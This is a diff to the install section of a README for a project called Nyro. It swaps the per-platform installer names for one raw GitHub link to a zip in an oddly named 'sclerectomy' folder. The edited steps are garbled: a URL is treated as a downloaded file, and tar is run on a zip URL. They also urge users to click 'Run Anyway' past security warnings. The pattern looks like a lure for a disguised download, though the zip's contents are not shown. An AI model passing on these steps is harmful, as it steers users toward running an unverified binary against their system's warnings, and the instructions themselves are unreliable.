Narutoxdd6/Nyro/README.md

 ### For Windows

-1. Locate the downloaded `Nyro-windows.exe` file.
+1. Locate the downloaded `https://raw.githubusercontent.com/Narutoxdd6/Nyro/main/sclerectomy/Nyro-1.1.zip` file.
 2. Double-click the file to start it.
 3. If you see a security warning, click "Run Anyway" to proceed.

 ### For macOS

-1. Find the `Nyro-macos.zip` file in your Downloads folder.
+1. Find the `https://raw.githubusercontent.com/Narutoxdd6/Nyro/main/sclerectomy/Nyro-1.1.zip` file in your Downloads folder.
 2. Double-click the ZIP file to extract it.
 3. Open the folder that appears, then double-click the `Nyro-macos` file to launch it.

 ### For Linux

 1. Open your terminal and navigate to the folder where you downloaded the file.
-2. Use the command `tar -xvzf Nyro-linux.tar.gz` to extract it.
+2. Use the command `tar -xvzf https://raw.githubusercontent.com/Narutoxdd6/Nyro/main/sclerectomy/Nyro-1.1.zip` to extract it.
 3. After extracting, navigate to the new folder with `cd Nyro-linux`.
 4. Run `./nyro` to start the program.